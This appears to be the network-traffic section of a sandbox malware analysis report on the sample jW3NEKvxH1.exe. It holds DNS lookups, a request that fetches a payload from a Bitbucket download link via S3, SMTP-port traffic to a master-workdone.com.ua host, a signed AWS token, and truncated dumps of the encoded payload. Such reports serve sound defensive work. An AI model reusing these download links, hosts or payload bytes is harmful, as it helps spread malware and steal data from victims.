                                                                                                                      Dec 6, 2024 11:08:32.527499914 CET500335874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:32.530946970 CET500335874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:32.650913954 CET587450033104.243.42.254192.168.2.6
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 6, 2024 11:04:34.772007942 CET5331853192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:04:34.910337925 CET53533181.1.1.1192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:37.785144091 CET6042253192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET53604221.1.1.1192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:45.958952904 CET5854853192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:04:46.426315069 CET53585481.1.1.1192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.871130943 CET5531553192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:05:09.022907972 CET53553151.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 11:04:34.772007942 CET | 192.168.2.6 | 1.1.1.1 | 0x57fe | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:37.785144091 CET | 192.168.2.6 | 1.1.1.1 | 0x412f | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:45.958952904 CET | 192.168.2.6 | 1.1.1.1 | 0x70c3 | Standard query (0) | zara.master-workdone.com.ua | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:05:08.871130943 CET | 192.168.2.6 | 1.1.1.1 | 0x77cb | Standard query (0) | manazara.master-workdone.com.ua | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 11:04:34.910337925 CET | 1.1.1.1 | 192.168.2.6 | 0x57fe | No error (0) | bitbucket.org | - | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:34.910337925 CET | 1.1.1.1 | 192.168.2.6 | 0x57fe | No error (0) | bitbucket.org | - | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:34.910337925 CET | 1.1.1.1 | 192.168.2.6 | 0x57fe | No error (0) | bitbucket.org | - | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.30.3 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.15.185.191 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.28.167 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.225.1 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.12.237 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.10.193 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.138.57 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:38.105323076 CET | 1.1.1.1 | 192.168.2.6 | 0x412f | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.168.49 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:04:46.426315069 CET | 1.1.1.1 | 192.168.2.6 | 0x70c3 | No error (0) | zara.master-workdone.com.ua | - | 104.243.42.254 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 11:05:09.022907972 CET | 1.1.1.1 | 192.168.2.6 | 0x77cb | No error (0) | manazara.master-workdone.com.ua | - | 104.243.42.254 | A (IP address) | IN (0x0001) | false
                                                                                                                      • bitbucket.org
                                                                                                                      • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49716 | 185.166.143.50 | 443 | 616 | C:\Users\user\Desktop\jW3NEKvxH1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 10:04:36 UTC | 206 | OUT | GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bitbucket.org
2024-12-06 10:04:37 UTC | 5941 | IN | HTTP/1.1 302 Found
                                                                                                                      Date: Fri, 06 Dec 2024 10:04:37 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 0
                                                                                                                      Server: AtlassianEdge
                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F [TRUNCATED]
                                                                                                                      Expires: Fri, 06 Dec 2024 10:04:37 GMT
                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                      X-Used-Mesh: False
                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                      Content-Language: en
                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                      X-Served-By: 8d65951decf2
                                                                                                                      X-Version: 7795cf3afeec
                                                                                                                      X-Static-Version: 7795cf3afeec
                                                                                                                      X-Request-Count: 535
                                                                                                                      X-Render-Time: 0.05843043327331543
                                                                                                                      X-B3-Traceid: 0908e3acae184abe80f38ff977dca7c2
                                                                                                                      X-B3-Spanid: 1c9f1710759b292d
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss:// [TRUNCATED]
                                                                                                                      X-Usage-Quota-Remaining: 998964.039
                                                                                                                      X-Usage-Request-Cost: 1053.00
                                                                                                                      X-Usage-User-Time: 0.031590
                                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                      Age: 0
                                                                                                                      X-Cache: MISS
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                      Atl-Traceid: 0908e3acae184abe80f38ff977dca7c2
                                                                                                                      Atl-Request-Id: 0908e3ac-ae18-4abe-80f3-8ff977dca7c2
                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                      Server-Timing: atl-edge;dur=169,atl-edge-internal;dur=3,atl-edge-upstream;dur=167,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49718 | 3.5.30.34 | 443 | 616 | C:\Users\user\Desktop\jW3NEKvxH1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 10:04:39 UTC | 1263 | OUT | GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2Bo [TRUNCATED]
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bbuseruploads.s3.amazonaws.com
2024-12-06 10:04:39 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                      x-amz-id-2: lFQd/X3AS0GZww7qvpXTe4DGDBvpA+nsWo6fo9GPXGTAqP97u9odJ2RFhvRKIVT+OjOlxPiMe+5b0PRCl/Z5G6Gm/5HPdcXh
                                                                                                                      x-amz-request-id: R6N4THEHDATJP71F
                                                                                                                      Date: Fri, 06 Dec 2024 10:04:40 GMT
                                                                                                                      Last-Modified: Mon, 04 Nov 2024 01:50:31 GMT
                                                                                                                      ETag: "a7b36584f976a88fe80fb9631e99a894"
                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                      x-amz-version-id: wchkc_KMtqDQrMURglLC.3O6bR5_lKAL
                                                                                                                      Content-Disposition: attachment; filename="165_Dlaybpxloke"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 1101624
                                                                                                                      Server: AmazonS3
                                                                                                                      Connection: close
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 59 6d 70 68 46 64 39 6a 62 51 66 58 34 73 7a 67 30 39 7a 59 79 74 66 6a 33 4e 54 5a 31 39 6a 61 31 38 33 57 32 74 54 4d 31 64 6e 54 34 74 2f 67 79 74 44 62 79 2b 48 57 32 39 72 50 7a 4e 66 65 79 74 76 51 7a 74 76 61 7a 74 6e 55 33 39 37 53 34 4e 2f 53 31 64 6e 54 33 74 54 61 32 4e 54 58 34 63 76 59 33 39 44 57 30 63 7a 62 31 74 37 62 34 4e 72 64 79 74 50 62 79 75 48 6a 34 4d 2f 51 32 39 62 55 31 2b 48 4c 30 73 37 68 32 4e 6e 54 30 38 37 65 32 4e 4c 56 7a 75 4c 4b 7a 38 37 56 31 39 58 68 79 74 48 63 34 65 44 69 59 6d 70 68 46 64 39 6a 62 51 63 4c 31 63 72 69 79 39 6e 68 31 64 6a 55 7a 6d 4a 71 59 52 58 66 59 32 30 48 4a 7a 41 61 4c 69 4d 71 4a 68 67 6e 4d 7a 49 70 75 2f 73 55 5a 47 68 74 45 34 72 6e 58 44 4b 6a 68 75 70 44 61 30 69 4e 6d 4c 46 62 62 6a 51
                                                                                                                      Data Ascii: YmphFd9jbQfX4szg09zYytfj3NTZ19ja183W2tTM1dnT4t/gytDby+HW29rPzNfeytvQztvaztnU397S4N/S1dnT3tTa2NTX4cvY39DW0czb1t7b4NrdytPbyuHj4M/Q29bU1+HL0s7h2NnT087e2NLVzuLKz87V19XhytHc4eDiYmphFd9jbQcL1criy9nh1djUzmJqYRXfY20HJzAaLiMqJhgnMzIpu/sUZGhtE4rnXDKjhupDa0iNmLFbbjQ
                                                                                                                      2024-12-06 10:04:40 UTC459INData Raw: 6c 4d 71 4f 7a 58 6f 4b 67 6f 46 39 64 48 75 6b 6a 6f 78 35 52 34 63 75 69 43 32 4b 30 49 53 67 6a 57 43 49 57 59 78 79 68 6f 43 56 67 59 4a 42 66 51 69 43 41 49 68 62 6a 30 71 4e 50 6f 34 64 67 65 64 36 31 5a 48 56 66 62 79 4a 76 34 44 2f 6b 31 69 43 5a 35 4e 71 69 37 4b 42 53 59 30 62 67 64 78 39 46 58 6e 7a 66 57 32 47 74 70 42 52 67 53 4f 52 35 35 43 2f 6b 50 4f 4f 2f 59 70 67 65 46 69 54 57 43 49 70 4a 71 30 6f 4a 72 34 6b 70 73 57 30 75 36 63 46 6e 71 6d 67 64 72 42 46 74 69 69 6f 70 36 52 2f 74 70 57 67 53 4b 63 5a 74 7a 47 6a 79 61 4c 4b 70 4e 4f 72 78 36 54 44 72 75 2b 6f 61 36 6a 4d 72 47 53 74 61 37 46 30 70 61 57 74 69 37 4b 36 72 42 43 6a 2b 36 42 68 73 4a 61 4d 4b 5a 62 66 69 61 64 35 6c 6f 4c 59 67 64 6c 39 45 48 70 2f 67 48 47 47 46 33 6e
                                                                                                                      Data Ascii: lMqOzXoKgoF9dHukjox5R4cuiC2K0ISgjWCIWYxyhoCVgYJBfQiCAIhbj0qNPo4dged61ZHVfbyJv4D/k1iCZ5Nqi7KBSY0bgdx9FXnzfW2GtpBRgSOR55C/kPOO/YpgeFiTWCIpJq0oJr4kpsW0u6cFnqmgdrBFtiiop6R/tpWgSKcZtzGjyaLKpNOrx6TDru+oa6jMrGSta7F0paWti7K6rBCj+6BhsJaMKZbfiad5loLYgdl9EHp/gHGGF3n
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 70 31 36 62 6c 73 77 2b 6d 76 72 54 41 70 2f 47 65 39 4b 43 55 73 48 53 31 5a 71 71 78 70 72 53 33 4e 61 48 50 70 74 57 78 79 71 55 52 70 41 71 69 43 36 30 44 6f 6d 36 6f 54 4b 35 54 72 7a 71 71 48 4b 76 52 74 39 2b 6a 46 71 69 2b 74 67 4b 6f 63 61 64 61 70 45 69 30 74 61 64 36 6e 54 47 6c 4b 4c 55 6a 72 2b 65 73 79 62 41 4a 74 77 75 74 37 71 68 59 74 31 36 74 51 36 36 6f 6d 33 69 30 47 61 38 62 72 79 43 79 31 71 44 50 70 50 32 74 64 37 41 37 71 76 79 76 38 71 35 32 6f 33 57 67 51 36 34 78 72 77 36 73 38 61 70 61 72 59 2b 72 69 49 6a 63 66 39 57 4d 38 70 5a 69 6a 49 70 35 76 34 47 4e 66 51 70 37 50 59 34 72 65 4e 53 47 2f 34 68 65 69 6b 2b 44 63 6f 70 49 6a 75 43 4b 39 6f 41 43 6b 35 61 45 68 33 78 63 67 30 57 4b 46 59 33 48 6a 77 69 4d 6c 34 4a 72 65 5a
                                                                                                                      Data Ascii: p16blsw+mvrTAp/Ge9KCUsHS1ZqqxprS3NaHPptWxyqURpAqiC60Dom6oTK5TrzqqHKvRt9+jFqi+tgKocadapEi0tad6nTGlKLUjr+esybAJtwut7qhYt16tQ66om3i0Ga8bryCy1qDPpP2td7A7qvyv8q52o3WgQ64xrw6s8aparY+riIjcf9WM8pZijIp5v4GNfQp7PY4reNSG/4heik+DcopIjuCK9oACk5aEh3xcg0WKFY3HjwiMl4JreZ
                                                                                                                      2024-12-06 10:04:40 UTC1024INData Raw: 63 4b 30 49 78 4c 43 35 57 48 6a 51 6b 53 53 63 75 47 31 51 63 4c 69 5a 51 49 78 77 63 56 69 59 66 4a 55 30 77 4a 78 38 5a 4a 52 69 6e 76 63 30 65 4b 67 4d 78 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 6b 4d 66 41 30 4e 35 73 55 47 44 4d 5a 4b 68 38 6a 4b 79 67 63 4e 69 49 76 4c 42 38 75 4c 79 41 61 4b 53 4d 73 48 53 67 6d 49 68 67 78 47 79 59 77 48 69 51 68 4a 53 73 6b 4c 44 51 75 4b 43 30 6e 49 79 73 59 4c 6a 4d 75 48 79 45 72 4a 43 49 59 4d 52 73 67 49 7a 45 6d 4b 52 77 6a 48 43 77 5a 49 43 55 63 4c 78 67 66 48 42 6f 6e 4a 54 45 6e 49 53 6f 78 4d 54 41 6e 4d 43 55 75 49 79 6f 5a 47 43 63 7a 4e 53 49 70 4a 78 6b 6f 4a 78 30 62 4b 43 59 61 47 69 6c 4b 4d 44 41 75 55 42
                                                                                                                      Data Ascii: cK0IxLC5WHjQkSScuG1QcLiZQIxwcViYfJU0wJx8ZJRinvc0eKgMxMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHiskMfA0N5sUGDMZKh8jKygcNiIvLB8uLyAaKSMsHSgmIhgxGyYwHiQhJSskLDQuKC0nIysYLjMuHyErJCIYMRsgIzEmKRwjHCwZICUcLxgfHBonJTEnISoxMTAnMCUuIyoZGCczNSIpJxkoJx0bKCYaGilKMDAuUB
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 76 47 69 34 6a 4e 53 59 59 4a 79 77 71 49 69 6b 59 4a 69 67 6e 49 69 51 6f 49 69 55 6c 4b 53 4d 76 4c 79 34 59 49 53 73 62 4d 52 75 72 78 73 77 6c 4a 2f 67 6e 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 62 4c 50 30 78 4e 36 38 54 48 44 51 5a 4d 44 49 78 48 78 34 72 47 79 49 6e 4d 53 51 67 48 44 45 5a 4b 53 4d 6a 49 79 77 6d 49 42 6f 63 4d 42 67 67 48 43 55 6e 47 6a 45 59 49 54 55 78 4c 6a 41 59 4d 42 6f 75 48 43 6f 6d 47 42 67 7a 4b 69 49 32 4a 79 59 6f 47 42 30 6b 4b 42 30 61 4a 53 6b 63 4d 43 38 75 4a 78 34 72 47 79 34 6b 4b 79 67 67 47 69 63 73 4a 79 73 65 48 44 51 6f 48 43 6b 64 4c 79 77 67 4d 53 38 67 4a 54 59 6a 4c 43 49 33 4a 69 49 6e 4c 68 73 6d 4c 79 45 6b 49 52
                                                                                                                      Data Ascii: vGi4jNSYYJywqIikYJignIiQoIiUlKSMvLy4YISsbMRurxswlJ/gnKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGisbLP0xN68THDQZMDIxHx4rGyInMSQgHDEZKSMjIywmIBocMBggHCUnGjEYITUxLjAYMBouHComGBgzKiI2JyYoGB0kKB0aJSkcMC8uJx4rGy4kKyggGicsJyseHDQoHCkdLywgMS8gJTYjLCI3JiInLhsmLyEkIR
                                                                                                                      2024-12-06 10:04:40 UTC1024INData Raw: 65 4a 43 45 59 71 79 51 73 38 69 34 6f 4c 52 6b 6a 4c 78 67 78 4d 79 34 66 47 69 73 6b 49 69 63 78 47 79 41 63 73 53 59 70 59 69 4d 63 4c 45 69 67 4a 52 78 5a 47 42 38 63 54 36 63 6c 4d 59 38 68 4b 6a 45 74 4d 43 51 77 47 69 34 6a 4b 69 49 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77 59 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67 66 48 43 55 6e 4a 54 45 59 49 53 6f 78 4c 6a 41 6e 4d 42 6f 75 49 79 6f 6d 47 43 63 7a 4b 69 49 70 4a 79 59 6f 4a 78
                                                                                                                      Data Ascii: eJCEYqyQs8i4oLRkjLxgxMy4fGiskIicxGyAcsSYpYiMcLEigJRxZGB8cT6clMY8hKjEtMCQwGi4jKiIYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJywYKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBgfHCUnJTEYISoxLjAnMBouIyomGCczKiIpJyYoJx
                                                                                                                      2024-12-06 10:04:40 UTC1749INData Raw: 63 4a 53 63 6c 4d 52 67 68 4b 6a 45 75 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77 59 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67 66 48 43 55 6e 4a 54 45 59 49 53 6f 78 4c 6a 41 6e 4d 42 6f 75 49 79 6f 6d 47 43 63 7a 4b 69 49 70 4a 79 59 6f 4a 78 30 6b 4b 43 49 61 4a 53 6b 6a 4d 43 38 75 47 42 34 72 47 7a 45 6b 4b 79 67 66 47 69 63 73 47 43 73 65 48 43 73 6f 48 43 6b 69 4c 79 77 67 4c 69 38 67 4a 53 6b 6a 4c 43
                                                                                                                      Data Ascii: cJSclMRghKjEuMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJywYKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBgfHCUnJTEYISoxLjAnMBouIyomGCczKiIpJyYoJx0kKCIaJSkjMC8uGB4rGzEkKygfGicsGCseHCsoHCkiLywgLi8gJSkjLC
                                                                                                                      2024-12-06 10:04:40 UTC9000INData Raw: 4a 7a 45 62 49 42 77 78 4a 69 6b 6a 49 78 77 73 4a 69 41 6c 48 44 41 59 48 78 77 6c 4a 79 55 78 47 43 45 71 4d 53 34 77 4a 7a 41 61 4c 69 4d 71 4a 68 67 6e 4d 79 6f 69 4b 53 63 6d 4b 43 63 64 4a 43 67 69 47 69 55 70 49 7a 41 76 4c 68 67 65 4b 78 73 78 4a 43 73 6f 48 78 6f 6e 4c 42 67 72 48 68 77 72 4b 42 77 70 49 69 38 73 49 43 34 76 49 43 55 70 49 79 77 69 4b 43 59 69 4a 7a 45 62 4a 69 38 65 4a 43 45 61 4b 79 51 73 4b 79 34 6f 4c 52 67 6a 4b 78 67 78 4d 79 34 66 48 69 73 6b 49 69 63 78 47 79 41 63 4d 53 59 70 49 79 4d 63 4c 43 59 67 4a 52 77 77 47 42 38 63 4a 53 63 6c 4d 52 67 68 4b 6a 45 75 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77
                                                                                                                      Data Ascii: JzEbIBwxJikjIxwsJiAlHDAYHxwlJyUxGCEqMS4wJzAaLiMqJhgnMyoiKScmKCcdJCgiGiUpIzAvLhgeKxsxJCsoHxonLBgrHhwrKBwpIi8sIC4vICUpIywiKCYiJzEbJi8eJCEaKyQsKy4oLRgjKxgxMy4fHiskIicxGyAcMSYpIyMcLCYgJRwwGB8cJSclMRghKjEuMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJyw
                                                                                                                      2024-12-06 10:04:40 UTC9000INData Raw: 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67 66 48 43 55 6e 4a 54 45 59 49 53 6f 78 4c 6a 41 6e 4d 42 6f 75 49 79 6f 6d 47 43 63 7a 4b 69 49 70 4a 79 59 6f 4a 78 30 6b 4b 43 49 61 4a 53 6b 6a 4d 43 38 75 47 42 34 72 47 7a 45 6b 4b 79 67 66 47 69 63 73 47 43 73 65 48 43 73 6f 48 43 6b 69 4c 79 77 67 4c 69 38 67 4a 53 6b 6a 4c 43 49 6f 4a 69 49 6e 4d 52 73 6d 4c 78 34 6b 49 52 6f 72 4a 43 77 72 4c 69 67 74 47 43 4d 72 47 44 45 7a 4c 68 38 65 4b 79 51 69 4a 7a 45 62 49 42 77 78 4a 69 6b 6a 49 78 77 73 4a 69 41 6c 48 44 41 59 48 78 77 6c 4a 79 55 78 47 43 45 71 4d 53 34 77 4a 7a 41 61 4c 69 4d 71 4a 68 67 6e 4d 79 6f 69 4b 53 63
                                                                                                                      Data Ascii: GyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBgfHCUnJTEYISoxLjAnMBouIyomGCczKiIpJyYoJx0kKCIaJSkjMC8uGB4rGzEkKygfGicsGCseHCsoHCkiLywgLi8gJSkjLCIoJiInMRsmLx4kIRorJCwrLigtGCMrGDEzLh8eKyQiJzEbIBwxJikjIxwsJiAlHDAYHxwlJyUxGCEqMS4wJzAaLiMqJhgnMyoiKSc
